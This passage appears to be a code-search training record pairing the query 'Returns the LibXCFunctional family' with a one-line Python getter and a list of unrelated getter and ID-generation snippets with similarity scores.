"def unique_id(self) -> str:\n return pulumi.get(self, \"unique_id\")", "def get_id(self):\n pass", "def get_id(self):\n pass", "def get_id(self):\n pass", "def get_id(self):\n pass", "def get_family_id(self):\n # Implemented from template for osid.resource.ResourceLookupSession.get_bin_id\n return self._catalog_id", "def get_family_id(self):\n # Implemented from template for osid.resource.ResourceLookupSession.get_bin_id\n return self._catalog_id", "def get_family_id(self):\n # Implemented from template for osid.resource.ResourceLookupSession.get_bin_id\n return self._catalog_id", "def get_id(self) -> str:\n return self._register_id", "def get_family_id(self):\n return self._family_id", "def getId(self):\n return _libsbml.SBase_getId(self)", "def unique_id(self):\n return self._device.mac", "def generate_fwan_process_id() -> str:\n return str(uuid.uuid4())", "def getId(self):\n return _libsbml.SubListOfSpeciesFeatures_getId(self)", "def test_id():\n with expected_protocol(\n DCXS,\n [(\"?\", \"DCXS750-4\"), ],\n ) as inst:\n assert inst.id == \"DCXS750-4\"", "def unique_id(self) -> str:\n return get_frigate_entity_unique_id(\n self._config_entry.entry_id, \"sensor_detector_speed\", self._detector_name\n )", "def get_uuid():\n return str(uuid4())", "def get_id(self):\n \"\"\"Requires use of Python 3\"\"\"\n return str(self.id)", "def unique_id(self):\n return self.device_id + '_' + self._sensor_type", "def get_uuid():\n\n return str(uuid.uuid4())", "def getID(self):\r\n return self._interface.UID", "def id(self):\n return id(self._component)", "def setId(self, *args):\n return _libsbml.FunctionDefinition_setId(self, *args)", "def get_uuid():\n\n x = uuid.uuid1()\n return str(x)", "def unique_id(self):\n return self._deviceId", "def getuid():\n if current().subtype == TestSubType.Example:\n testname = f\"{basename(parentname(current().name)).replace(' ', '_').replace(',','')}\"\n else:\n testname = f\"{basename(current().name).replace(' ', '_').replace(',','')}\"\n\n for char in ['(', ')', '[', ']','\\'']:\n testname = testname.replace(f'{char}', '')\n\n return testname + \"_\" + str(uuid.uuid1()).replace('-', '_')", "def getID(self) -> int:\n ...", "def unique_id(self):\n return f\"{self.device.id}-{self.key}\"", "def getIdAttribute(self):\n return _libsbml.SBase_getIdAttribute(self)", "def known_uid():\n return '48ee71d9-20f0-41fc-a99f-c518121a880e'", "def getId(self):\n return _libsbml.QualitativeSpecies_getId(self)", "def makeid(cls):\n return str(uuid.uuid4().hex)", "def cred_def_id(self) -> str:\n return self._cred_def_id", "def _get_uuid():\n return str(uuid.uuid4())", "def uid():\r\n u = str(uuid.uuid4())[:22]\r\n u = u.replace(\"-\",\"_\")\r\n return u", "def file_system_id(self) -> str:\n return pulumi.get(self, \"file_system_id\")", "def getIdent (self) :\n return self.id", "def getId(self):\n return _libsbml.FluxBound_getId(self)", "def new_case_id():\n return uuid.uuid4().hex", "def new_case_id():\n return uuid.uuid4().hex", "def identifier(self):\r\n return self.id", "def get_device_id(self) -> str:\n return Config.get('device_id')", "def get_ir_identifier(dataset_type, FOLD, AUTHOR, POST):\n global FEATURES_STR\n return dataset_type + '-ir-fo' + str(FOLD) + '-fe' +\\\n FEATURES_STR + '-a' + str(AUTHOR) + '-p' + str(POST)", "def unique_identifier(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"unique_identifier\")", "def getId(self):\n return _libsbml.Species_getId(self)", "def cal_guid(self):\n return 'setup' + str(self.id) + '@lnldb'" ]
[ "0.65617096", "0.63113815", "0.6098559", "0.6041057", "0.59945154", "0.5900914", "0.587187", "0.58197254", "0.5804145", "0.5734139", "0.57230854", "0.5713289", "0.57015187", "0.5693463", "0.56737447", "0.5662043", "0.56479746", "0.5644955", "0.5611577", "0.5568527", "0.5564561", "0.55570626", "0.5556264", "0.55559456", "0.55281705", "0.5520941", "0.55080426", "0.5491368", "0.5480187", "0.54696286", "0.546906", "0.5468594", "0.5438764", "0.54367995", "0.54291695", "0.542747", "0.5425614", "0.54183155", "0.5408875", "0.540208", "0.5399488", "0.5389739", "0.53896", "0.5384865", "0.5383634", "0.53799284", "0.53692716", "0.53620356", "0.53596073", "0.5358471", "0.53495586", "0.5348274", "0.534189", "0.53411585", "0.5340756", "0.53327817", "0.5330289", "0.5330289", "0.5330289", "0.5330289", "0.53245103", "0.53245103", "0.53245103", "0.5322585", "0.53189903", "0.5313854", "0.5313333", "0.5310052", "0.5309549", "0.5309423", "0.5301645", "0.53012234", "0.52975595", "0.52904785", "0.5290093", "0.5282531", "0.5279771", "0.52731586", "0.52709854", "0.52708495", "0.5270839", "0.5269107", "0.5267232", "0.5253802", "0.52519417", "0.5245526", "0.5244594", "0.52418315", "0.5236693", "0.5228939", "0.5224563", "0.52241313", "0.52236986", "0.5223173", "0.5223173", "0.52198493", "0.5217585", "0.52145046", "0.52049947", "0.5201885", "0.5199752" ]
0.0
-1
Returns the LibXCFunctional kind.
def get_kind(self): return self._kind
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_type(self):\n return self.get_udev_property('ID_FS_TYPE')", "def kind(self):\n return self.get_data(\"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def get_fs_type(self):\n\t\treturn call_sdk_function('PrlFsInfo_GetFsType', self.handle)", "def get_kind(self, ):\n return self.get_parameter('kind')", "def kind(self):\n return self._kind()", "def kind(cls):\n return cls.__name__", "def kind(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"kind\")", "def kind(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"kind\")", "def kind(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"kind\")", "def _get_kind(cls):\n return cls.__name__", "def cfunc_type(self):\n tif = ida_typeinf.tinfo_t()\n result = self.get_func_type(tif)\n if not result:\n return\n return tif", "def kind(self):\n return self._kind", "def kind(self):\n return self._kind", "def logictype(self):\n if (self.symbol.type == self.scanner.LOGIC_TYPE):\n device_kind_string = self.names.get_name_string(self.symbol.id)\n device_kind = self.names.query(device_kind_string)\n self.symbol = self.scanner.get_symbol()\n return device_kind\n else:\n # Error: Valid Logic gate required e.g. 'AND'\n # Stopping symbols: ';' , '}', 'CONNECT', 'MONITOR' or 'END'\n # KEYWORD\n self.error(\n self.LOGIC_GATE, [\n self.scanner.KEYWORD, self.scanner.SEMICOLON,\n self.scanner.RIGHT_CURLY], [\n self.scanner.CONNECT_ID, self.scanner.MONITOR_ID,\n self.scanner.END_ID])\n return None", "def kind(self) -> Optional[str]:\n return pulumi.get(self, \"kind\")", "def kind(self) -> Optional[str]:\n return pulumi.get(self, \"kind\")", "def kind(self) -> Optional[str]:\n return pulumi.get(self, \"kind\")", "def kind(self) -> Optional[str]:\n return pulumi.get(self, \"kind\")", "def resource_kind(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_kind\")", "def get_type(self):\n\t\treturn call_sdk_function('PrlFsInfo_GetType', self.handle)", "def kind(self):\n # type () -> str\n return np.dtype(self.type).kind", "def kind(self):\r\n return TypeKind.from_id(self._kind_id)", "def kind(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"kind\")", "def kind(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"kind\")", "def kind(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"kind\")", "def fstype(self):\n return self._properties.get('fstype')", "def kind(self) -> Optional[pulumi.Input[Union[str, 'Kind']]]:\n return pulumi.get(self, \"kind\")", "def device_type(self):\n # type: () -> string_types\n return self._device_type", "def kind(self) -> \"TriggerEventKind\":\n return TriggerEventKind.from_value(self._attrs.get(\"kind\"))", "def _kind(d):\n return _SYMBOL_KIND_MAP.get(d.type)", "def test_ds18b20_get_kind(self):\n assert_equal(self.test_ds18b20.get_kind(), 'mpds18b20')", "def GetKind(self):\r\n\r\n return self.kind", "def device_type(self):\n return Context.devtype2str[self.device_typeid]", "def device_type(self):\n return Context.devtype2str[self.device_typeid]", "def get_type_functional_name(type):\n name = type.name\n if type.is_simple:\n return name\n elif type.is_enum:\n return 'str'\n elif type.is_complex:\n return get_class_name(name)", "def kind(self):\n raise NotImplementedError()", "def service_kind(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"service_kind\")", "def functional(self):\n return self.vasprun.run_type", "def type(self):\n return self._device.type_name", "def workload_kind(self):\n return self.workload_arg(arg=\"kind\", default=\"pod\")", "def kind(self):\n # type () -> str\n if pa.types.is_date(self.arrow_dtype):\n return \"O\"\n else:\n return np.dtype(self.arrow_dtype.to_pandas_dtype()).kind", "def test_probehealth_get_kind(self):\n assert_equal(self.test_probehealth.get_kind(), 'mpprobehealth')", "def _cim_feature_type():\n return {\n 'name' : 'cim_feature_type',\n 'is_open' : False,\n 'doc' : None,\n 'members' : [\n ('file', None),\n ('diagnostic', None),\n ],\n }", "def file_type(self):\n try:\n return self.get_driver().ShortName\n except AttributeError:\n return", "def kind(self, kind: \"TriggerEventKind\"):\n if isinstance(kind, Enum):\n self._attrs[\"kind\"] = kind.value\n else:\n self._attrs[\"kind\"] = kind # If you supply a string, we presume you know the service will take it.", "def _device_type_returner(self, symbol):\n if self.names.get_name_string(symbol.id) == \"AND\":\n return self.devices.AND\n if self.names.get_name_string(symbol.id) == \"OR\":\n return self.devices.OR\n if self.names.get_name_string(symbol.id) == \"NAND\":\n return self.devices.NAND\n if self.names.get_name_string(symbol.id) == \"NOR\":\n return self.devices.NOR\n if self.names.get_name_string(symbol.id) == \"XOR\":\n return self.devices.XOR\n if self.names.get_name_string(symbol.id) == \"CLOCK\":\n return self.devices.CLOCK\n if self.names.get_name_string(symbol.id) == \"SWITCH\":\n return self.devices.SWITCH\n if self.names.get_name_string(symbol.id) == \"DTYPE\":\n return self.devices.D_TYPE\n if self.names.get_name_string(symbol.id) == \"SIGGEN\":\n return self.devices.SIGGEN", "def kind(self):\n return self.__key.kind()", "def _get_fcoe_intf_port_type(self):\n return self.__fcoe_intf_port_type", "def get_resource_type(self):\n category = self.get_first_category(DATA_KIND_SCHEME)\n if category is not None:\n return category.label\n else:\n return None", "def getTypeCode(self):\n return _libsbml.FunctionDefinition_getTypeCode(self)", "def CFN_RESOURCE_TYPE_NAME(cls) -> str:\n return jsii.sget(cls, \"CFN_RESOURCE_TYPE_NAME\")", "def CFN_RESOURCE_TYPE_NAME(cls) -> str:\n return jsii.sget(cls, \"CFN_RESOURCE_TYPE_NAME\")", "def CFN_RESOURCE_TYPE_NAME(cls) -> str:\n return jsii.sget(cls, \"CFN_RESOURCE_TYPE_NAME\")", "def CFN_RESOURCE_TYPE_NAME(cls) -> str:\n return jsii.sget(cls, \"CFN_RESOURCE_TYPE_NAME\")", "def CFN_RESOURCE_TYPE_NAME(cls) -> str:\n return jsii.sget(cls, \"CFN_RESOURCE_TYPE_NAME\")", "def CFN_RESOURCE_TYPE_NAME(cls) -> str:\n return jsii.sget(cls, \"CFN_RESOURCE_TYPE_NAME\")", "def CFN_RESOURCE_TYPE_NAME(cls) -> str:\n return jsii.sget(cls, \"CFN_RESOURCE_TYPE_NAME\")", "def get_func_type(self, *args):\n return _ida_hexrays.cfunc_t_get_func_type(self, *args)", "def device_type(self):\n return self._meta['device_type']", "def service_kind(self) -> pulumi.Input[Union[str, 'ServiceKind']]:\n return pulumi.get(self, \"service_kind\")", "def device_type(self):\n return self._device_type", "def get_type(self):\n\t\treturn call_sdk_function('PrlFsEntry_GetType', self.handle)", "def file_type(self):\n ftype = str(self.FileType)\n choices = None\n if self.FileType == 'Driver':\n choices = {\n 0x0: 'Unknown',\n 0x1: 'Printer',\n 0x2: 'Keyboard',\n 0x3: 'Language',\n 0x4: 'Display',\n 0x5: 'Mouse',\n 0x6: 'Network',\n 0x7: 'System',\n 0x8: 'Installable',\n 0x9: 'Sound',\n 0xA: 'Comms',\n 0xB: 'Input Method',\n 0xC: 'Versioned Printer',\n }\n elif self.FileType == 'Font':\n choices = {\n 0x1: 'Raster',\n 0x2: 'Vector',\n 0x3: 'Truetype',\n }\n if choices != None:\n subtype = obj.Object('Enumeration', 0x28, vm = self.obj_vm, parent = self, choices = choices)\n ftype += \" (\" + str(subtype) + \")\"\n\n return ftype", "def compliance_type(self) -> str:\n return pulumi.get(self, \"compliance_type\")", "def test_snmpdisk_get_kind(self):\n assert_equal(self.test_snmpdisk.get_kind(), 'mpsnmpdisk')", "def GetKind(self):\n\n pass", "def GetKind(self):\n\n return self._persistentHandler.GetKind()", "def datatype(f):\n from numpy import bool, uint8, uint16, int32\n code = f.dtype\n if code == bool: type='binary'\n elif code == uint8: type='uint8'\n elif code == uint16: type='uint16'\n elif code == int32: type='int32'\n else:\n assert 0,'Does not accept this typecode: %s' % code\n return type", "def device_type(self):\r\n return self._arm.device_type", "def get_kind_name(self) -> str:\n\n return self.kindName_", "def getTypeCode(self):\n return _libsbml.SpeciesFeatureType_getTypeCode(self)", "def isFunctionalEntity(*args):\n return _libsbml.SBO_isFunctionalEntity(*args)", "def kind(self):\n return self._accepted_class", "def drive_type():", "def test_snmpcustom_get_kind(self):\n assert_equal(self.test_snmpcustom.get_kind(), 'mpsnmpcustom')" ]
[ "0.5934257", "0.5878089", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.5819375", "0.58169264", "0.5813604", "0.57783896", "0.5737581", "0.5737581", "0.5679485", "0.56524044", "0.5652121", "0.5651738", "0.5651738", "0.5581144", "0.55534375", "0.55534375", "0.55534375", "0.55534375", "0.5551814", "0.5546409", "0.55282646", "0.55231833", "0.55194193", "0.55194193", "0.55194193", "0.5507177", "0.5494091", "0.548742", "0.5424947", "0.54020077", "0.5380507", "0.5348951", "0.53197294", "0.53197294", "0.5293546", "0.52918947", "0.52845335", "0.5249846", "0.52474034", "0.5237344", "0.52215695", "0.52117324", "0.5190694", "0.5152101", "0.51481426", "0.5145331", "0.5141768", "0.5136337", "0.51360655", "0.5135424", "0.5134249", "0.5134249", "0.5134249", "0.5134249", "0.5134249", "0.5134249", "0.5134249", "0.5127907", "0.5107817", "0.50991464", "0.50938493", "0.508911", "0.5089071", "0.5075883", "0.5058665", "0.5052307", "0.5043387", "0.50250185", "0.4988023", "0.49863183", "0.49854717", "0.49847293", "0.49804157", "0.49773416", "0.49757516" ]
0.552994
45
Returns the LibXCFunctional name.
def get_name(self): return self._name
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def name(self):\n name = self.function_name\n\n # Feature type is based on additional data that used\n # for example if insight is for Healthsites Facilities\n # than feature type is Healthsites Facilities\n\n if self.feature_type:\n name = '%s for %s' % (name, self.feature_type)\n return name", "def function_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"function_name\")", "def function_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"function_name\")", "def function_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"function_name\")", "def function_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"function_name\")", "def name(self):\n\t\treturn self._func_name", "def function_name(cls):\n function_name = String(cls.__name__).snakecase().lower()\n return function_name", "def __name__(self):\n return '_'.join([function.__name__ for function in self.functions])", "def function_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"function_name\")", "def display_name(self) -> str:\n return f\"{self.func.__module__}.{self.func.__qualname__}\"", "def getName(self):\n return _libsbml.FunctionDefinition_getName(self)", "def name(self):\n _LOGGER.debug(self._shelly_cloud_device_name + ' >>> ' +\n self._shelly_cloud_entity_name + ' >>> name() >>> ' +\n self._shelly_cloud_device_name)\n return self._shelly_cloud_device_name", "def get_function_name(self):\n return self.__function", "def get_class_functional_name(name):\n name = _strip_class_name(name)\n return name", "def name(cls):\n return arg.s()(cls.func).func.__name__", "def _function_name(func):\n return \"Calling the function: def {}()\".format(func.__name__)", "def function(self) -> str:\n return pulumi.get(self, \"function\")", "def get_type_functional_name(type):\n name = type.name\n if type.is_simple:\n return name\n elif type.is_enum:\n return 'str'\n elif type.is_complex:\n return get_class_name(name)", "def get_name(self):\n bcname = _pychidg.f90wrap_get_name(self=self._handle)\n return bcname", "def name() -> str:\n pass", "def name(self):\n return f\"{get_device_name(self._data, 0, self._name)}\"", "def getElementName(self):\n return _libsbml.FunctionDefinition_getElementName(self)", "def get_name() -> str:\n pass", "def name(self) -> str:", "def name(self) -> str:", "def name(self) -> str:", "def name(self) -> str:", "def name(self) -> str:", "def getName():", "def getName():", "def getName():", "def getName():", "def getName():", "def getName():", "def getElementName(self):\n return _libsbml.FunctionTerm_getElementName(self)", "def function_name_to_string(func):\n if func == statistical_parity_difference:\n return \"Statistical Parity Difference\"\n if func == theil_index:\n return \"Theil Index\"\n if func == equal_opportunity_difference:\n return \"Equal Opportunity Difference\"\n if func == disparate_impact:\n return \"Disparate Impact\"\n if func == average_odds_difference:\n return \"Average Odds Difference\"\n if func == auc:\n return \"AUC\"\n if func == binary_accuracy:\n return \"Binary Accuracy\"", "def get_name() -> str:", "def get_name(self):\n raise DeviceException(DeviceException.FEATURE_NOT_IMPLEMENTED)", "def fname(func: Callable) -> str:\n return \"{}.{}\".format(func.__module__, func.__name__)", "def get_name():\n return __name__", "def name(self) -> str: # pragma: no cover", "def nice_name():\n\n pass", "def fortran_function(self) -> str:\n return ''.join([i.fortran_function() for i in self.instances])", "def get_name():", "def getName(self):\n\t\traise NotImplementedError(\"Function not implemented.\")", "def fname(func):\n return \"%s.%s\" % (func.__module__, func.__name__)", "def getElementName(self):\n return _libsbml.ListOfFunctionDefinitions_getElementName(self)", "def get_function(self,attr):\n func_name = self._user_funcs[attr] \n if hasattr(func_name,'__call__'):\n func_name = func_name(self)\n return func_name", "def name(self):\n return str()", "def get_function_name(ifunc, *, scoped=False, mangle=False):\n\n name = _translate_function_name(interrogate_function_name(ifunc), mangle)\n\n if scoped:\n parent = interrogate_function_class(ifunc)\n if parent:\n name = get_type_name(parent, scoped=True, mangle=mangle) + '.' + name\n\n return name", "def name():\n pass", "def name():\n pass", "def getElementName(self):\n return _libsbml.ListOfSpeciesFeatures_getElementName(self)", "def get_name(self) -> str:\n pass", "def name(self):\n return self._tf.name", "def get_fmu_name(self):\n return self.name", "def python_name(self):\n return self.requirement.name", "def getElementName(self):\n return _libsbml.SpeciesFeatureType_getElementName(self)", "def getName(self):\n return _libsbml.FbcExtension_getName(self)", "def as_function_name(self, string):\n return idaapi.COLSTR(string, idaapi.SCOLOR_CNAME)", "def getName(self):\r\n return self.__name__", "def get_function_name():\n\n # inspect.stack()[0][2] returns name of this function\n function_name = inspect.stack()[1][3]\n\n return function_name", "def get_name(app):\n from uuid import uuid4 as uuid\n return (f'accelpy_{app[\"application\"][\"product_id\"]}'\n f'_{str(uuid()).replace(\"-\", \"\")[:8]}')", "def get_qual_name(func: object) -> str:\n return func.__module__ + \".\" + func.__name__", "def funcName():\r\n import sys\r\n return sys._getframe(1).f_code.co_name", "def function_name(func):\n return log(level=\"info\", message=_function_name(func))", "def get_name(self) -> str:\n raise NotImplementedError", "def get_function_name(wrapped, instance, args, kwargs):\n return wrapped.__name__", "def Name(self) -> str:", "def Name(self) -> str:", "def Name(self) -> str:", "def Name(self) -> str:", "def get_name(self) -> str:\n return self.__name", "def getElementName(self):\n return _libsbml.ListOfFunctionTerms_getElementName(self)", "def funcname(func):\n try:\n return '%s()' % func.__name__\n except AttributeError:\n return repr(func)", "def name(self):\n return f\"{self.device_name} {self.device_variable}\"", "def getElementName(self):\n return _libsbml.SpeciesFeature_getElementName(self)", "def whoami(self):\n func_name = inspect.stack()[1][3]\n if func_name[:5] == 'test_':\n return func_name[5:]", "def get_func_name(func, resolv_alias=True, win_characters=True):\r\n if hasattr(func, '__module__'):\r\n module = func.__module__\r\n else:\r\n try:\r\n module = inspect.getmodule(func)\r\n except TypeError:\r\n if hasattr(func, '__class__'):\r\n module = func.__class__.__module__\r\n else:\r\n module = 'unknown'\r\n if module is None:\r\n # Happens in doctests, eg\r\n module = ''\r\n if module == '__main__':\r\n try:\r\n filename = os.path.abspath(inspect.getsourcefile(func))\r\n except:\r\n filename = None\r\n if filename is not None:\r\n # mangling of full path to filename\r\n parts = filename.split(os.sep)\r\n if parts[-1].startswith('<ipython-input'):\r\n # function is defined in an IPython session. The filename\r\n # will change with every new kernel instance. This hack\r\n # always returns the same filename\r\n parts[-1] = '__ipython-input__'\r\n filename = '-'.join(parts)\r\n if filename.endswith('.py'):\r\n filename = filename[:-3]\r\n module = module + '-' + filename\r\n module = module.split('.')\r\n if hasattr(func, 'func_name'):\r\n name = func.func_name\r\n elif hasattr(func, '__name__'):\r\n name = func.__name__\r\n else:\r\n name = 'unknown'\r\n # Hack to detect functions not defined at the module-level\r\n if resolv_alias:\r\n # TODO: Maybe add a warning here?\r\n if hasattr(func, 'func_globals') and name in func.func_globals:\r\n if not func.func_globals[name] is func:\r\n name = '%s-alias' % name\r\n if inspect.ismethod(func):\r\n # We need to add the name of the class\r\n if hasattr(func, 'im_class'):\r\n klass = func.im_class\r\n module.append(klass.__name__)\r\n if os.name == 'nt' and win_characters:\r\n # Stupid windows can't encode certain characters in filenames\r\n name = _clean_win_chars(name)\r\n module = [_clean_win_chars(s) for s in module]\r\n return module, name", "def getName(self) -> unicode:\n ...", "def getName(self) -> unicode:\n ...", "def getName(self) -> unicode:\n ...", "def getName(self) -> unicode:\n ...", "def getName(self) -> unicode:\n ...", "def GetModernizedTestName(self, arg):\n return arg", "def test_name(self):\r\n parts = []\r\n if self.test.__module__ != '__main__':\r\n parts.append(self.test.__module__)\r\n if hasattr(self.test, 'im_class'):\r\n parts.append(self.test.im_class.__name__)\r\n parts.append(self.test.__name__)\r\n return '.'.join(parts)", "def get_name(self): #Doctests, pour tester directement les méthodes\n return self.__name", "def name():\n\n pass", "def source_test_file_name():\n return 'feature'", "def _get_func_name(func):\n parts = []\n module = inspect.getmodule(func)\n if module:\n parts.append(module.__name__)\n\n qualname = func.__qualname__\n if qualname != func.__name__:\n parts.append(qualname[: qualname.find(\".\")])\n\n parts.append(func.__name__)\n return \".\".join(parts)", "def name(self):\n # type: () -> string_types\n return self._name", "def name(self):\n # type: () -> string_types\n return self._name", "def get_name(self):\n raise NotImplementedError", "def get_name(self):\n raise NotImplementedError", "def get_name(self):\n raise NotImplementedError", "def get_name(self):\n raise NotImplementedError", "def name(self):\n return f\"{self.sensor_type['name']} ({self._mac[-5:]})\"", "def name(self) -> str:\n ...", "def name(self) -> str:\n ...", "def getName(self):\n return \"\"", "def fqfabric_name(self):\n return self._fqfabric_name" ]
[ "0.66209394", "0.6552643", "0.6552643", "0.6492396", "0.6492396", "0.64339757", "0.64050496", "0.63731533", "0.6299338", "0.622816", "0.6214293", "0.617792", "0.61538583", "0.61080116", "0.6059312", "0.5927638", "0.58204305", "0.58170474", "0.58135116", "0.58068055", "0.5779131", "0.5749917", "0.5736055", "0.57348925", "0.57348925", "0.57348925", "0.57348925", "0.57348925", "0.5727579", "0.5727579", "0.5727579", "0.5727579", "0.5727579", "0.5727579", "0.5718528", "0.5697139", "0.56795174", "0.56765187", "0.5676146", "0.5640277", "0.5617237", "0.56147337", "0.5614723", "0.56065434", "0.5593323", "0.558887", "0.5576054", "0.5547802", "0.55471927", "0.55390686", "0.5513824", "0.5513824", "0.55078113", "0.55069685", "0.54967725", "0.5496457", "0.5493203", "0.5471786", "0.5471764", "0.5468301", "0.5457914", "0.54528546", "0.5447624", "0.54401875", "0.54389125", "0.5432376", "0.5430814", "0.5430741", "0.5427777", "0.5427777", "0.5427777", "0.5427777", "0.5427737", "0.54036486", "0.5393519", "0.53901345", "0.5389312", "0.53883445", "0.5387963", "0.53874445", "0.53874445", "0.53874445", "0.53874445", "0.53874445", "0.53831553", "0.5383064", "0.53807086", "0.53784144", "0.5377444", "0.53769845", "0.5364541", "0.5364541", "0.5364036", "0.5364036", "0.5364036", "0.5364036", "0.535904", "0.5355906", "0.5355906", "0.5355405", "0.5355374" ]
0.0
-1
Returns the LibXCFunctional family.
def get_family(self): return self._family
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_01_GetFamily(self):\n self.m_device_obj.DeviceFamily = TESTING_FAMILY_NAME_1\n l_family = FamUtil.get_family(self.m_device_obj)\n # print(PrettyFormatAny.form(l_family, 'B3-01-A - Family'))\n self.assertEqual(l_family, TESTING_FAMILY_NAME_1)", "def test_02_GetFamily(self):\n self.m_device_obj.DeviceFamily = TESTING_FAMILY_NAME_2\n l_family = FamUtil.get_family(self.m_device_obj)\n # print(PrettyFormatAny.form(l_family, 'B3-02-A - Family'))\n self.assertEqual(l_family, TESTING_FAMILY_NAME_2)", "def device_family(self):\n return self._dll.JLINKARM_GetDeviceFamily()", "def family(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"family\")", "def family(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"family\")", "def family(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"family\")", "def get_family(self):\n # Implemented from template for osid.resource.ResourceLookupSession.get_bin\n return self._catalog", "def get_family(self):\n # Implemented from template for osid.resource.ResourceLookupSession.get_bin\n return self._catalog", "def get_family(self):\n # Implemented from template for osid.resource.ResourceLookupSession.get_bin\n return self._catalog", "def family(self) -> Optional[str]:\n return pulumi.get(self, \"family\")", "def family(self) -> Optional[str]:\n return pulumi.get(self, \"family\")", "def family(self) -> Optional[str]:\n return pulumi.get(self, \"family\")", "def read_device_family(self):\n family = ctypes.c_int()\n\n result = self._lib.NRFJPROG_read_device_family(ctypes.byref(family))\n if result != NrfjprogdllErr.SUCCESS:\n raise APIError(result)\n\n return DeviceFamily(family.value).name", "def family(self):", "def get_family_name(self):\n return self.family_name", "def GetFamily(*args, **kwargs):\n return _gdi_.Font_GetFamily(*args, **kwargs)", "def model_family(self) -> str:\n return self._model_family", "def af(self):\n return self.opts_family", "def get_family(self, family_id):\n return self.__make_api_call('get/family/{}'.format(family_id))", "def GetFamilyString(*args, **kwargs):\n return _gdi_.Font_GetFamilyString(*args, **kwargs)", "def _check_family(self):\n return", "def getFamilyName(self):\n return _libsbml.ModelCreator_getFamilyName(self)", "def test_02_GetFamilyObj1(self):\n self.m_device_obj.DeviceFamily = TESTING_FAMILY_NAME_1\n l_obj = FamUtil._get_family_obj(self.m_pyhouse_obj, self.m_device_obj)\n # print(PrettyFormatAny.form(l_obj, 'B2-02-A - Family'))\n self.assertEqual(l_obj.Name, TESTING_FAMILY_NAME_1)\n self.assertEqual(l_obj.Active, True)\n self.assertEqual(l_obj.Key, 1)\n self.assertEqual(l_obj.FamilyDevice_ModuleName, 'Insteon_device')\n self.assertEqual(l_obj.FamilyPackageName, 'Modules.Families.Insteon')\n self.assertEqual(l_obj.FamilyXml_ModuleName, 'Insteon_xml')", "def family(self):\n return self.sock.family", "def find_family(self, needle):\n return self.__make_api_call('find/family/{}'.format(needle))", "def navigation_type(self):\n return 'Family'", "def test_01_Family(self):\n l_xml = self.m_xml.light_sect[0]\n print(PrettyFormatAny.form(l_xml, 'C3-01-A - XML'))\n l_device = self.m_device_obj\n l_light = FamUtil.read_family_data(self.m_pyhouse_obj, l_device, l_xml)\n print(PrettyFormatAny.form(l_light, 'C3-01-B - Light'))\n self.assertEqual(l_device.Name, TESTING_LIGHT_NAME_0)\n self.assertEqual(l_light.InsteonAddress, convert.dotted_hex2int(TESTING_INSTEON_ADDRESS_0))", "def test_04_GetFamilyObj3(self):\n self.m_device_obj.DeviceFamily = TESTING_FAMILY_NAME_3\n l_obj = FamUtil._get_family_obj(self.m_pyhouse_obj, self.m_device_obj)\n # print(PrettyFormatAny.form(l_obj, 'B2-04-A - Family'))\n self.assertEqual(l_obj.Name, TESTING_FAMILY_NAME_3)\n self.assertEqual(l_obj.Active, True)\n self.assertEqual(l_obj.Key, 3)\n self.assertEqual(l_obj.FamilyDevice_ModuleName, 'X10_device')\n self.assertEqual(l_obj.FamilyPackageName, 'Modules.Families.X10')\n self.assertEqual(l_obj.FamilyXml_ModuleName, 'X10_xml')", "def get_nh_family(self):\n return int(self.get('nhr_family'))", "def family_name(self):\n return FAMILY_NAME", "def test_05_GetFamilyObj4(self):\n self.m_device_obj.DeviceFamily = TESTING_FAMILY_NAME_4\n l_obj = FamUtil._get_family_obj(self.m_pyhouse_obj, self.m_device_obj)\n # 